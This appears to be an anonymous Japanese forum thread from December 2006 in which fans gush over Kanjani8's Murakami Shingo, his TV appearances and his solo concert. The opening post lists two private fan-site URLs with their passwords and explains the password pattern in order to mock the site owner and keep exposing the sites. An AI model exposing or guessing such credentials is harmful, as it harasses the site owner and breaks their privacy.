規模縮小で移転→http://id38.fm-p.jp/27/yokomura/『nyak』(即晒される)
今度は日記だけのサイトにしてる→http://id38.fm-p.jp/29/gokipuri/『warav』(今日晒しましたw)
ちなみに↑↑は晒されるごとにパスワードのvが増えるそうですwちなみに管理人の頭文字をとったnyakのパスワード。頭の文字を後ろに持っていく法則なんてのも使ってます。どこまでやれば閉鎖するか見物ですよw

128 :ユー&名無しネ:2006/12/08(金) 21:19:05 ID:lEqPv+0R
今月の片目誌とD誌の上目遣いギチョサンハァ━━━━━*´Д`*━━━━━ン!!

129 :ユー&名無しネ:2006/12/08(金) 21:47:01 ID:IFrCxlYS
ていうか芋誌のストレートギチョサンがステチな件
あれ最新髪型?

130 :ユー&名無しネ:2006/12/09(土) 04:22:15 ID:yFkM4+OJ
>127
引っ掛かってやんのpgr
それ全部トリップだし

131 :ユー&名無しネ:2006/12/09(土) 10:25:33 ID:p1yGurUt
>127 名前変えてどうのってソイシ某K?Aの方?

132 :ユー&名無しネ:2006/12/09(土) 13:34:33 ID:kQ4FA0fo
スカ日記
まっ赤っかなギチョサンハァ━━━*´Д`*━━━ン!!

133 :ユー&名無しネ:2006/12/10(日) 00:28:32 ID:lzWZR008
>127 KはKでそ 懐かしい名前を見たな 折繋がりネタは荒れるから以後スルー推奨

134 :ユー&名無しネ:2006/12/10(日) 00:44:14 ID:lUqo233s
(日本一の)団扇姐さん筆頭にあのとき盛り上がった団扇作成姐さん方ギチョサン紺参戦できるのか能
ソロでのギチョサンも姐さん方の団扇もwktk杉

135 :ユー&名無しネ:2006/12/10(日) 00:47:17 ID:J+SF1QCf
自分は(高槻の)(ヒーモ)で行く予定(w
隣がオモロ姐さんならコラボもありだ能(w

136 :ユー&名無しネ:2006/12/10(日) 01:28:19 ID:JA1RUfkw
(高槻の)(ヒーモ)の姐さんの横二人が(ファンタジスタ)(ヒーモ)

とかだったら紺どころじゃなくて腹イタイ件(w
ウチワwktk

137 :ユー&名無しネ:2006/12/10(日) 01:33:08 ID:dAp5B7FV
自分は(高槻の)(ファンタジスタ)でFA(w
参戦する姐さん方当日はヨロですん(*´∀`)ノシ

138 :ユー&名無しネ:2006/12/10(日) 01:33:10 ID:J2xkRpYT
自分片面がファンタジスタだ(ノ∀`)
ちなみに裏がにんにくにんなのでどの姐さんの隣がベストだろうか(w

139 :ユー&名無しネ:2006/12/10(日) 01:44:54 ID:JA1RUfkw
ギチョサンから客席見て左隣が(8万円)じゃね?(w

140 :ユー&名無しネ:2006/12/10(日) 01:53:37 ID:nDau1IdG
自分は片面が(大阪太郎)なんだが
独り参戦だからもう片面が悩みどころ

141 :ユー&名無しネ:2006/12/10(日) 02:09:36 ID:dAp5B7FV
>140
つ【日本一の】

そんなときこそコソーリ隣の姐さんとコラボするべきジャマイカ(w

142 :ユー&名無しネ:2006/12/10(日) 02:14:49 ID:JA1RUfkw
やっかし形容詞とか「〜の」的なものの方が

143 :140:2006/12/10(日) 12:19:39 ID:nDau1IdG
>141
>142
d!形容詞でいくノシ


144 :ユー&名無しネ:2006/12/10(日) 22:11:26 ID:J+SF1QCf
ギチョサンいいたもキタァ━━━*´Д`*━━━━━ン!!!!
wktkすぎて吐きそう

145 :ユー&名無しネ:2006/12/10(日) 22:52:22 ID:J2xkRpYT
ソロコンにイイタモにはなまるに兵か(*´∀`)
何年か前はこんなにwktkな年末がくるなんて想像もしなかったとシジミ

146 :ユー&名無しネ:2006/12/10(日) 23:26:55 ID:Opr40ckN
>145
姐さんはぐれもお忘れなく(*´∀`)

147 :140:2006/12/11(月) 00:55:15 ID:Prv42Mof
>145
姐さん戦士もね


148 :145:2006/12/11(月) 00:58:02 ID:2yPKynTZ
>146-147
姐さんたちありがd!
wktkが多いのはステチなことだが自分の頭がついていかナスビ(ノ∀`)

149 :ユー&名無しネ:2006/12/11(月) 01:04:28 ID:6gz5moj2
ギチョサン全国露出目前ということだから
これを機会に髪を切ろうそうしよう

13日はめまぐるしく過ぎていきそうだ(w

150 :ユー&名無しネ:2006/12/11(月) 01:22:09 ID:Zl+IeG3q
あえてのロン毛で金様似をアピール

151 :ユー&名無しネ:2006/12/11(月) 02:48:50 ID:uWgyrEQr
もうここにはまともな議長担はいなくなったのか

ここにいるならユニスレくんな


152 :ユー&名無しネ:2006/12/11(月) 21:57:52 ID:Zl+IeG3q
兵ビクーリ顔カ●゙エかった(*´Д`)

153 :ユー&名無しネ:2006/12/12(火) 10:26:00 ID:/RlPcEqq
>152
ノシノシ
テラモヘた(*´∀`)

154 :ユー&名無しネ:2006/12/12(火) 11:53:52 ID:NYkSUiPd
自分もモヘたけど昨日のギチョサン髪ペッタンコじゃなかった?
セットの関係だと思うけど気になって気になって

155 :ユー&名無しネ:2006/12/12(火) 12:13:02 ID:GqFAuJ8i
>154
直前までニット帽かなにか被ってたんジャマイカ?

156 :ユー&名無しネ:2006/12/12(火) 18:22:37 ID:XjKTwtPh
はなまるといいたもwktk杉て今日眠れなさそうだ(*´∀`)

157 :ユー&名無しネ:2006/12/12(火) 18:30:07 ID:jCS/iXVY
はなまるにFAXする姐さんいるか能
自分wktkし杉て変なこと書きそうだよ('A`)

158 :ユー&名無しネ:2006/12/12(火) 20:46:38 ID:0rl+yDNw
>157
ノシ
大阪太郎を生で披露してホスィ
照れるギチョサンの羞恥プレーwktk

159 :ユー&名無しネ:2006/12/12(火) 21:06:43 ID:1tC9vqsY
朝からにんにくにん(w
アンケQはショッキング後だなwktk

160 :ユー&名無しネ:2006/12/12(火) 23:20:38 ID:AbvdOm72
せっかく豚局出入り解禁なのだからウケ狙いじゃなくつい
次の仕事に繋がるような内容を考えてしまう…orz
若者の投票率を上げる方法や節税対策を語れるってむしろダメか?
亀田ケンカ祭なら局的にオゲだろうな

161 :ユー&名無しネ:2006/12/13(水) 05:29:11 ID:08w+gW6u
ヤクマルにwktkし過ぎて早く起きた自分(w
もうTVの前で正座して待ってますからねギチョサン

162 :ユー&名無しネ:2006/12/13(水) 07:20:27 ID:pdjOfNCt
朝から無駄に緊張し過ぎて胃が痛いよギチョサンorz
ギチョサンのビズ最強で最高(-人-)ナモナモ

163 :ユー&名無しネ:2006/12/13(水) 11:47:41 ID:xli1RJUg
ヤクマル見逃して死にそうだ吐きそうだ

164 :ユー&名無しネ:2006/12/13(水) 12:30:04 ID:nfvKvzcy
>163
(;´∀`)ノシ

165 :ユー&名無しネ:2006/12/13(水) 13:09:30 ID:baOVQ1Te
ギチョサンどっちもビズ良くてハァ━━━*´Д`*━━━━━ン!!!!
見逃し姐さんはぜひとも荼毘ってもらうことをおすすめするよ

166 :ユー&名無しネ:2006/12/13(水) 13:14:02 ID:Im7/22RE
はなまるギチョサンテラテラビズヨカタァ━━━━*´Д`*━━━━ン!!!!
イイタモギチョサンは田中タンと並んで脚長が際立ってて(*´Д`)

167 :ユー&名無しネ:2006/12/13(水) 13:17:36 ID:dQdf+FRy
特にはなまるは最高画質で永久保存をおすすめだね

168 :ユー&名無しネ:2006/12/13(水) 13:43:59 ID:LV22kM7b
ガイドCMもハァ━━━━━*´Д`*━━━━━ン!!
捕獲の価値アリ!

169 :ユー&名無しネ:2006/12/13(水) 17:50:47 ID:HB74ea4H
>163
丼米

170 :ユー&名無しネ:2006/12/13(水) 21:19:12 ID:d0lcHA3P
>128姐さんいつガイドCMキタ?
捕獲し損ねた

171 :ユー&名無しネ:2006/12/13(水) 21:27:10 ID:4MOIaArU
128でも168でもないが、5分番組が狙い目

172 :ユー&名無しネ:2006/12/13(水) 21:44:54 ID:d0lcHA3P
>171
頓!
はなまる途中にガイドCMキタかと思った
カフェしかビデオ撮って無い

173 :ユー&名無しネ:2006/12/13(水) 21:46:14 ID:4MOIaArU
いや豚局じゃやらないから
ttp://kikaku.tvguide.or.jp/kanjyani8/index.html

174 :ユー&名無しネ:2006/12/13(水) 21:47:57 ID:baOVQ1Te
明日のなるトモ録ったらやる可能性高いかな

175 :ユー&名無しネ:2006/12/13(水) 22:09:33 ID:LV22kM7b
自分はなるトモの後の30分間で捕獲した
昼前のニュースが終わった後だったはず

176 :ユー&名無しネ:2006/12/13(水) 23:31:33 ID:fTzjl5MS
ガイドCMイイタモ終了直後に
ふとテレ東に回したらすぐ来た

177 :ユー&名無しネ:2006/12/14(木) 00:51:49 ID:wjgAoQ/z
ガイドCMのギチョサンおいしいよな

178 :ユー&名無しネ:2006/12/14(木) 01:57:23 ID:WN5r9cs4
日テレでNANAの途中でやってた
ギチョサン乙だな(w

179 :ユー&名無しネ:2006/12/14(木) 13:08:29 ID:XDqyIUVR
はなまるのカレンダーに貼るポラおすましギチョサンでカ●゙エかった(*´∀`)

180 :ユー&名無しネ:2006/12/14(木) 15:06:17 ID:vmi5bYDb
>179
ノシ
それ見るために今日もはなまるチェックした

181 :ユー&名無しネ:2006/12/14(木) 16:42:57 ID:JsIa155t
見逃した人です
みんな気を使ってくれてありがとう
友達にダビしてもらえることになったよ
よかった
永久保存だ

182 :ユー&名無しネ:2006/12/14(木) 19:13:54 ID:jkr6Nci4
ギチョサンのソロ紺Tサツの後ろに小さく書いてある
HOME SWEET HOME ってギチョサン紺の副題か?
なんか色々とwktk(´Д`*)

183 :ユー&名無しネ:2006/12/14(木) 19:32:14 ID:J24GSMRA
>182
モトリークルーしか浮かばなかったが違うだろうな(w

MWCSのロゴと同じ人のデザインかな?
ちゃんとエイト君もいるエンブレム(´Д`*)

184 :ユー&名無しネ:2006/12/14(木) 19:53:44 ID:XDqyIUVR
シュールなギチョサン紺wktk

185 :ユー&名無しネ:2006/12/14(木) 23:39:19 ID:vNFv7lKo
おとこまえですね

186 :ユー&名無しネ:2006/12/15(金) 06:33:14 ID:4c/qhBEX
ふぁんたじすたですから

187 :ユー&名無しネ:2006/12/15(金) 14:46:58 ID:pIireJSp
こうほうたんとうですから

188 :ユー&名無しネ:2006/12/15(金) 16:46:44 ID:yuqegTER
ぽじてぃぶですから

189 :ユー&名無しネ:2006/12/15(金) 20:58:44 ID:stB538x5
にんにくにんですから

190 :ユー&名無しネ:2006/12/15(金) 21:06:14 ID:GUWhVsvD
ひなちゃんですから

191 :ユー&名無しネ:2006/12/15(金) 21:08:44 ID:bQZyymmM
むだにごついですから

192 :ユー&名無しネ:2006/12/15(金) 21:14:39 ID:x7HHKqCf
たろうですから

193 :ユー&名無しネ:2006/12/15(金) 22:34:34 ID:QMS1tqdS
むだにあしもながいですから

194 :ユー&名無しネ:2006/12/15(金) 22:46:39 ID:0vYBOfzW
>190
ひなちゃんはもういませんから

195 :ユー&名無しネ:2006/12/15(金) 23:01:31 ID:/J66bwTW
ひなちゃんはいます、から

196 :ユー&名無しネ:2006/12/15(金) 23:14:13 ID:k3piBXAK
たかつきさんですから

197 :ユー&名無しネ:2006/12/15(金) 23:31:23 ID:+HmRizlb
ただめしすきですから

198 :ユー&名無しネ:2006/12/15(金) 23:45:20 ID:7KqnIiYJ
>194
この流れに乗れたら現れるかとorz

199 :ユー&名無しネ:2006/12/15(金) 23:59:28 ID:/J66bwTW
ひなちゃんはいますって

200 :ユー&名無しネ:2006/12/16(土) 00:04:43 ID:4c/qhBEX
たたかわなきゃげんじつと

201 :ユー&名無しネ:2006/12/16(土) 00:08:31 ID:yNlrIhAS
たたかわなきゃおやしらずと

202 :ユー&名無しネ:2006/12/16(土) 00:16:03 ID:tMJGlce4
たたかわなきゃよこぴーと

203 :ユー&名無しネ:2006/12/16(土) 00:20:05 ID:217jbf/4
たたかわなきゃおっさんと

204 :ユー&名無しネ:2006/12/16(土) 00:27:27 ID:saP9Nw3u
たたかわなきゃけーたろさんのちっすと

205 :ユー&名無しネ:2006/12/16(土) 00:41:00 ID:j4WP4YX7
たたかわなきゃはだあれと

206 :ユー&名無しネ:2006/12/16(土) 02:09:24 ID:TtY0+JDV
姐さん方楽しんでるところ流れ豚切スマソなんだが
ソロ紺の餡子の掛け声ってどうなるんだろ?
今までユニ内でのソロ紺行ったことないからどんな感じか
ワカランのだが
もし名前とかで掛け声するならギチョさんは何になるんだろう
無難にヒナかヒナチャソ?
それとも本名で信五?村上?
こんなことも気になるな

207 :ユー&名無しネ:2006/12/16(土) 02:32:58 ID:FrwAKg8d
>206
今日同じようなこと考えた(w
自分は想像したら「ヒーナ!ヒーナ!」しか思い浮かばなかった
ちなみにす親紺は普通に「アンコール!」だったよ

208 :ユー&名無しネ:2006/12/16(土) 04:31:59 ID:BY0w56Tg
太郎!太郎!

209 :ユー&名無しネ:2006/12/16(土) 06:46:22 ID:DmaauZ14
>208
(´Д`)にんにくにん!


アンコ太郎キタワァ*・゜゚・*:.。..。.:*・゜(n姐サン∀方)η*・゜゚・*:.。..。.:*・゜

210 :ユー&名無しネ:2006/12/16(土) 06:51:29 ID:DmaauZ14
×アンコ太郎
○餡子太郎

211 :ユー&名無しネ:2006/12/16(土) 06:59:15 ID:EWMRtNQ2
自分当然のように太郎とオモテた(*´∀`)ノシ

212 :ユー&名無しネ:2006/12/16(土) 12:15:10 ID:jnu8w6vN
ヒーモ!ヒーモ!

213 :ユー&名無しネ:2006/12/16(土) 12:27:51 ID:HXGjOBRk
班長はショータ!だったんだよな
アゴマルは普通にマール!だろうけどギチョサンは悩むな(ノ∀`)
いっそのことジョニーでどうだろう

214 :ユー&名無しネ:2006/12/16(土) 14:16:00 ID:G8lXT/n+
2ネムもフトゥの呼び名も豊富なだけに迷うな(w

215 :ユー&名無しネ:2006/12/16(土) 15:23:41 ID:tMJGlce4
紺にはギチョサンの大スチなおっさんや芸人サンも一杯くるんだろうか(ノ∀`*)
行く姐さん方よければ客席レポもお願いしますん

216 :ユー&名無しネ:2006/12/16(土) 15:58:04 ID:HXGjOBRk
モモコ姐さんたちは

(モモ∀コ)オーソレファミリーで行くで!

とノリノリで宣言してたな
でもオーソレって正直どこまでをファミリーと呼んでいいやら(ノ∀`)
芋づる式に人数が増えそうな気もする(w

217 :ユー&名無しネ:2006/12/16(土) 20:42:05 ID:7uCwSuLX
ttp://www.sankei.co.jp/culture/enterme/061216/ent061216001.htm

関ジャニ∞村上信五 高飛び込みに挑戦の学生演じる

218 :ユー&名無しネ:2006/12/16(土) 22:16:02 ID:EWMRtNQ2
百万石公演から帰ってきたノシ
罰ゲーム替え歌で謝るギチョサンハァ━━━*´Д`*━━━ン!!!!
オカッパコトリのギチョサンハァ━━━*´Д`*━━ン!!!!
フル○ンしたがるギチョサンハァ━━━*´Д`*━━━ン!!!!ギチョサンの全てがハァ━━━*´Д`*━━ン!!!!
な回ですた

219 :ユー&名無しネ:2006/12/16(土) 22:24:14 ID:EWMRtNQ2
落とし間違えたorz
逝ってくる

220 :ユー&名無しネ:2006/12/16(土) 23:20:33 ID:S9iIGkDt
今思い出したが明日のイイタモ増刊号チェキしないとな

221 :ユー&名無しネ:2006/12/17(日) 02:03:58 ID:KyR96dXg
ギチョサン髪切るとしたらどのぐらいなのかな
サパーリするのwktk

222 :ユー&名無しネ:2006/12/17(日) 02:08:52 ID:UZ1w9Geq
>220
姐さんdですん
おかげで思い出しました

223 :ユー&名無しネ:2006/12/17(日) 20:33:31 ID:uJBWu8N9
>221
短髪マッキーwktk

環八面で次のプレミアムギチョサンナモナモ

224 :ユー&名無しネ:2006/12/18(月) 14:18:57 ID:6OwGXk8J
前からなんとなくオモてたんだが、ギチョサンってお手本のようなピースするよな

225 :ユー&名無しネ:2006/12/18(月) 17:31:59 ID:d+NFwqMf
高槻のファンタジスタ

226 :ユー&名無しネ:2006/12/18(月) 23:14:52 ID:tnQvwJNq
大阪太郎のにんにくにん

227 :ユー&名無しネ:2006/12/19(火) 09:25:11 ID:gyhyt0hy
明日のはなまるカフェのオープニングは議長さんの写真アップからですん

写真チェキしたい方はお忘れなく

228 :ユー&名無しネ:2006/12/19(火) 12:45:58 ID:rAaXgK1x
豚(not相方切りスマソが
ギチョサンがソロで歌った曲って何があったか脳?

・たよりにしてまっせ
・歯が痛い
・白日夢
・無限の想い
・千年メドレー
・Who's foods

これぐらいしか思い出せナスビ(ノ∀`)

229 :ユー&名無しネ:2006/12/19(火) 13:20:00 ID:vs3uETMi
つ・どうしようもない

230 :ユー&名無しネ:2006/12/19(火) 21:24:31 ID:AxVFR1OA
ギチョサン新ヘアーwktk

231 :ユー&名無しネ:2006/12/19(火) 21:48:19 ID:wVhWIO16
つ・浪花やで

232 :ユー&名無しネ:2006/12/19(火) 22:26:15 ID:vs3uETMi
ちょアゴマル紺から戻ってきて録画してたアンカー見たら
ギチョサンのヘアースタイルにハァ━━━━━*´Д`*━━━━━ン!!
ちょっと前髪作っただけなのにテラテラカ○エエハァ━━━━━*´Д`*━━━━━ン!!
もう太郎紺が待ちきれナスビだよ

233 :ユー&名無しネ:2006/12/19(火) 22:35:13 ID:y02/J0TA
ギチョサンのヘアスタイルテラカコヨス!
全体的にふんわりしててカバ○エ

234 :ユー&名無しネ:2006/12/19(火) 23:56:01 ID:+PfRQfM3
ちょ
痴呆でアンカー見れずに紺もいけないジヌンにビジュレポ求ム
ソロ紺いける姐さんともみまん姐さんはみれるわけです ぬ

235 :ユー&名無しネ:2006/12/20(水) 09:57:18 ID:f1iwkRxe
はなまるギチョサンポラにカメラ寄らナスビだった(´・ω・`)

236 :ユー&名無しネ:2006/12/20(水) 15:16:24 ID:09BlGiEQ
隣板よりお邪魔します

蛇波の蛇星sページに克のはぐれレポがうぷされましたが
最後にギチョさんのおまけページがあります

237 :ユー&名無しネ:2006/12/20(水) 20:16:36 ID:/zyuasfV
>236
姐さんわざわざお知らせdですん つ且~~

それにしても前日にってギチョサン
どうせなら両パターンやっチャイナよ!

238 :ユー&名無しネ:2006/12/20(水) 22:55:40 ID:jCTk7lZG
>235姐さん
やっぱジャニは写真よけられるん棚

239 :ユー&名無しネ:2006/12/21(木) 00:00:53 ID:QXUUD52c
姐さん方、いよいよですね
自分2部入るのでできる限りレポしに来ますん
大阪太郎wktk

240 :ユー&名無しネ:2006/12/21(木) 00:17:59 ID:gWT094B1
>239
115で待ってますん

241 :ユー&名無しネ:2006/12/21(木) 00:54:04 ID:PCBVIAnz
>239
同じく115で待ってますん

ところで歩誌のギチョサンに反応した姐さんいないのか能
上目遣いなギチョサンハァ━━━*´Д`*━━━ン!!!!
腹筋肉バーンはギチョサンハァ━━━*´Д`*━━━ン!!!!
したのジヌンだけ?
そしてギチョサン以上にしっかりしてるヨメさんなんて中々に見つからない件

242 :ユー&名無しネ:2006/12/21(木) 03:20:41 ID:UjiR6gCP
ジヌン1部入ってきます
wktkし杉で寝れナス

243 :ユー&名無しネ:2006/12/21(木) 10:28:14 ID:5/EDk9Y6
昨日のアゴ両部に引き続き、ギチョサン両部いってくるノシ
昨日からギチョサン祭りでもう目汁が(⊃Д`)
うちわはもちろん『日本一の男前 シンゴリラ』

244 :ユー&名無しネ:2006/12/21(木) 10:31:53 ID:Bv3p2p9V
本日から鯱まで連戦全ステしてきますノシ
ギチョサンの頑張りに負けないよう(高槻の)(ファタジスタ)で応援してくる(`・ω・´)

245 :ユー&名無しネ:2006/12/21(木) 12:11:15 ID:QXUUD52c
>244姐さん
ファタジスタになってるYO(w
うちわ確認ヨロ(w

246 :ユー&名無しネ:2006/12/21(木) 15:19:57 ID:Ono9ouaN
>238>242
ちょっとおかしい所があるからあとちょっとロムってみよ
自分は歩誌のチィクビにモヘた(ノ∀`*)

247 :ユー&名無しネ:2006/12/21(木) 15:20:53 ID:Ono9ouaN
そういう自分がsage忘れ本当にスマソorz

248 :ユー&名無しネ:2006/12/21(木) 15:26:04 ID:QXUUD52c
>246
姐さん丼米
自分も歩誌のティクビとか腹筋とか諸々ハァ━━━*´Д`*━━━━━ン!!!!
ギチョサン相変わらずいい体してるな

249 :ユー&名無しネ:2006/12/21(木) 15:32:55 ID:gWT094B1
お顔と違って体はホントつるつるピカピカな肌で(*´Д`)
半開きのお口とかくしゅくしゅな髪とかハァ━━━━*´Д`*━━━━ン!!!!

250 :ユー&名無しネ:2006/12/21(木) 15:35:11 ID:/LAllMFb
自分はガイドの背筋ハァ━━━*´Д`*━━━━━ン!!!!
ブーメラン解禁まであと1週間ないんだな

251 :ユー&名無しネ:2006/12/21(木) 17:52:22 ID:W8wRTw/q
1部
生着替え&サービスの生足あり
歌ダンス小芝居MC混在なステージでした

252 :ユー&名無しネ:2006/12/21(木) 17:54:18 ID:mDr2gf5k
相変わらず変態臭いスレですね










ギチョサンハァ━━━*´Д`*━━━━━ン!!!!
ティクビハァ━━━*´Д`*━━━━━ン!!!!
ブーメランハァ━━━*´Д`*━━━━━ン!!!!

253 :ユー&名無しネ:2006/12/21(木) 18:18:55 ID:9p03zWfl
ギチョさんカコヨカッタヨーーー
上半身はあんなにツルペカなのに何故すねは…

FTONの頃に比べたらテラエエ身体になってて(*´Д`*)

254 :ユー&名無しネ:2006/12/21(木) 20:59:26 ID:NeT9Ecpv
>253
もう少しロムってみよう

255 :244:2006/12/21(木) 21:15:21 ID:Bv3p2p9V
うちわは間違ってなかったので
全て忘れてくれるとウレスィorz

そしてギチョサンの生着替えハァ━━━━━*´Д`*━━━━━ン!!
セクシーダンスハァ━━━━━*´Д`*━━━━━ン!!
芝居で思わず噴出すギチョサンハァ━━━━━*´Д`*━━━━━ン!!

そしてマジで言うがギチョサンかなり歌上手くなってたとオモー
「出せない手紙」の熱唱には思わず目汁だった

256 :ユー&名無しネ:2006/12/21(木) 23:10:24 ID:QXUUD52c
○の中に太の字の太郎衣装テラワロス(w
自分も本気で思うが、ギチョサン歌うまくなってた
面への手紙で思わず目汁

257 :ユー&名無しネ:2006/12/22(金) 02:09:22 ID:jkN0UPwG
2部のギチョサンレポ
該当スレにも落としましたが、覚えてる限り箇条書き
・新髪型テラカ○゙エエ
・1部は完璧だったと自画自賛(w
・レントゲン撮られるところの背中の筋肉ハァ━━━━━*´Д`*━━━━━ン!!
・浪花やで!ヲタも揃って大合唱
・出てきたズニアを一人残らずきちんと紹介
・す、ヘンリー、班長が出てきたときはやはり安心したのか
力が抜けたようなカンジだったとオモー
・スタンドマイクでロック歌うギチョサンテラハァ━━━━━*´Д`*━━━━━ン!!

全体的に筋肉がステチで色々モヘどころ満載でした
23日、24日行く姐さんお楽しみに

258 :ユー&名無しネ:2006/12/22(金) 08:50:29 ID:C+y8Yz5p
今日のサンスポ太郎衣装(w
さすがの着こなしですね

259 :ユー&名無しネ:2006/12/22(金) 16:21:21 ID:rfXkCe37
太郎衣装はサテン地でテラテラしてるんだが
途中脱ぎ捨てたとき裏地はかなりシカーリしてるように見えた(w
今回映像は使わない演出とのことなんだが
その分セットとか効果的に使われてるように感じますた

260 :ユー&名無しネ:2006/12/22(金) 17:05:45 ID:JdcjGgGC
姐さん方レポdですん
カクイクキメてもやっかし昭和だったりモサーリなギチョサンだいしてる(*´Д`)

261 :ユー&名無しネ:2006/12/22(金) 20:22:27 ID:hz6w9T/e
思い出しレポを少々
MC時にオレなんかまだまだ喋らん方やで的な発言に
ヲタええー!となるも、明石家さんまさん2ネーム(ryや
島田慎介さん(ryとかバケモンやで
ずーっと喋ってはるもんみたいな発言あり
ギチョサン目指してるのはそこなのかと小一時間

262 :ユー&名無しネ:2006/12/23(土) 00:42:33 ID:JIK45eXj
ギチョサン歌うまくなったなぁ

263 :ユー&名無しネ:2006/12/23(土) 01:35:14 ID:m4CINaST
本当にうまくなった
何かシジミだ
個人的には無限の想いが去年に比べて抜群にレベルアップしていたことで確信した

264 :ユー&名無しネ:2006/12/23(土) 03:24:02 ID:fDUnM+e+
どうしようもないじゃなくなってた

265 :ユー&名無しネ:2006/12/23(土) 03:29:27 ID:MS82fLZW
どうにかなっちゃう

266 :ユー&名無しネ:2006/12/23(土) 06:38:20 ID:KNg0/Wam
深山マジ消えてほしい
懐かしい曲沢山やってるのに大阪太郎やどうしようもないとか新しめな曲にしか反応しない奴多過ぎる
あの紺はズニア時代からちゃんと追い掛けてきてくれたファンにこそ見てほしいのにネタノリで見に来てる奴ばっか
深山少し引っ込んでろよ

267 :ユー&名無しネ:2006/12/23(土) 09:42:59 ID:c3l29Fqx
>266
オマイモナーって言われるような書き方何とかしなさい

268 :ユー&名無しネ:2006/12/23(土) 22:50:35 ID:GoNtpmbF
終演後芝居コーナーの緑ロンTを着たギチョサンを
厨が目かと思ったと(ノ∀`)
各方面に代わって謝りたい

269 :ユー&名無しネ:2006/12/24(日) 00:47:23 ID:bhs9kZd7
レポ見てるとカーデの交遊関係はホントに広いんだなと思い知らされる
武部幹事長の名前がそこで出てくるとは思わないよカーデ

270 :ユー&名無しネ:2006/12/24(日) 00:57:02 ID:tWHUaHhi
>269
つギチョサン

271 :ユー&名無しネ:2006/12/24(日) 01:04:11 ID:gY3ZzEF9
ギチョサン政界にまで手を広げて何を計画してるんだ(w

272 :ユー&名無しネ:2006/12/24(日) 01:21:47 ID:FcbA5WwE
ギチョサンがホントにギチョサンになったら℃うしよう(ノ∀`)

273 :ユー&名無しネ:2006/12/24(日) 01:35:25 ID:aMgc8vli
ちょっとしたおっさん(notの社会的地位が気になる木
政界の人と面識ある人はちょっとしたおっさんなのか(ノ∀`)

274 :ユー&名無しネ:2006/12/24(日) 01:38:57 ID:cvE4wpKz
ギチョサンから出馬宣言が出る日もそう遠くはない(w

275 :ユー&名無しネ:2006/12/24(日) 12:53:33 ID:Yd1zqnjr
ギチョサン高槻市長選挙出馬wktkだな(w

276 :ユー&名無しネ:2006/12/24(日) 15:34:37 ID:IVPha+lO
ポスター貼りまくリングだな
しかも紛失多発

277 :ユー&名無しネ:2006/12/24(日) 21:09:56 ID:LCzllL5c
議長ソロコン大成功おめ!


278 :ユー&名無しネ:2006/12/24(日) 22:30:43 ID:FcbA5WwE
ギチョサンソロ紺乙です!
だいしてるったらだいしてる

279 :ユー&名無しネ:2006/12/25(月) 00:18:34 ID:adEUv8L5
ギチョサン乙!
本当にいい紺だったよ
ギチョサン担を続けてきて良かった

280 :ユー&名無しネ:2006/12/25(月) 00:32:03 ID:XORSK87e
ギチョサン乙!
ギチョサンの頑張りに目汁が止まらナスビ(ノД`)

281 :ユー&名無しネ:2006/12/25(月) 00:36:02 ID:Lc1bIF18
ギチョサン10周年オメ!
そしてソロ紺も乙でした(*´∀`)
こんな節目のときにソロ紺参戦できて本当にウレスィ
贔屓目でなく歌もダンスも上手くなってたし
まだまだこれからも進化し続けるギチョサンであって欲しい

とりあえずあと6連続紺ガンガレ超ガンガレ!

282 :ユー&名無しネ:2006/12/25(月) 00:37:35 ID:zeuIJikO
そしてギチョサン入所10周年オメ
いつぞやの甘受一斉解雇で生き残った三馬鹿に拍手だ

283 :ユー&名無しネ:2006/12/25(月) 09:04:55 ID:24QeOMbk
ギチョサンオメ乙!
歌やダンスに加え年々ビズ向上してる奇ガス
甘受の歴史を切り開いてきた三馬鹿
その努力が今花開きつつあるよ

284 :ユー&名無しネ:2006/12/25(月) 10:56:56 ID:HPcEGw2l
ギチョさんオメ!
まだ夢から覚めないけどギチョさんは鯱で切替え完了してるんだろうな
でも「次があったらまた絶対来て下さい」と約束できてヨカタ

285 :ユー&名無しネ:2006/12/25(月) 14:16:58 ID:XYZ1Q0zM
ギチョサンお疲れさまそして10年おめでとう
一緒に楽しめて良かったよ
ギチョサンありがとう
これからも楽しませてね

そしてギチョサン担姐さんたちこれからもヨロシク

286 :ユー&名無しネ:2006/12/25(月) 15:26:07 ID:DV8HIC+S
ギチョサン遅くなったけど乙&オメ!
こんな節目に一緒にいられて嬉しかったよ
長いこと諦めずにギチョサンについてきて良かった
これからもずっと応援するのでガンガレ!

姐さんたちもこれからも末永くヨロ

287 :ユー&名無しネ:2006/12/25(月) 16:40:53 ID:KdSI9jMI
ギチョサンオメ
嘘臭い笑顔もだいしてる

288 :ユー&名無しネ:2006/12/25(月) 21:53:59 ID:MRN8bfLK
亀だがギチョサンソロ紺乙&10周年オメ!
今までの10年が努力が実った10年ならこれからの10年は収穫の10年
身に付けたことを糧にがんがって輝いていってホスィ
本当にまりがd!これからも一生付いていきます

で、今更気付いたんだが
セブンの年賀状ギチョサン漢字間違えてないか?(ノ∀`)
ガイシュツだったら申し訳

289 :ユー&名無しネ:2006/12/26(火) 23:41:46 ID:lWRFFAO7
隣板よりお邪魔します。
赤福参戦でお邪魔した者です。
本日2部のレンジャー中にまたまた自担の名前が出てビックリさせられました。
オーラ出す際に、ヘンリーさんが議長さんに「コイツ、キムラくんに似てる思ってんねん」みたいな事を言ってました
相変わらず自担びいきありがdです!
ソロコンは見に行けず、大阪太郎は見れなかったのですが、赤福よりカッコよくなりましたね。
自Gのペンラに気付いたのかブンブンお手振りされ、ビックリしましたが楽しませて頂きました。
タモステSPで共演出来なかったのがテラ残念です。
長文・スレ汚し失礼しました


290 :ユー&名無しネ:2006/12/27(水) 20:54:37 ID:yl71XWxI
ブーメランギチョサンハァ━━━━━*´Д`*━━━━━ン!!


291 :ユー&名無しネ:2006/12/28(木) 01:55:09 ID:muAn0Ymy
デラマなんか色々とハァ━━━*´Д`*━━━━━ン!!!!

筋肉とか筋肉とかもう本当にありがとうござ(ry

ギチョサンらしいデラマだったよ乙!

292 :ユー&名無しネ:2006/12/28(木) 08:49:38 ID:KAia5Mht
あのドラマは身体をスチなだけ凝視しろと
あらゆる角度から筋肉を拝めと
そーゆードラマですね関テレさんゴチでした

293 :ユー&名無しネ:2006/12/28(木) 13:28:59 ID:Dz6Bdf+p
ギチョサンの肩甲骨あたりの筋肉イすイ!

294 :ユー&名無しネ:2006/12/28(木) 16:15:08 ID:2+fQd+Zl
しうまい紺行ってきた
斜め後ろからキーボード弾くギチョサン見て泣いてしまうくらい
ハァ―――*´Д`*―――――ン!!
今回ビズがひたすら良すぎだな

295 :ユー&名無しネ:2006/12/29(金) 23:13:25 ID:Ch9s9Da8
夢かと心配にきたんだが
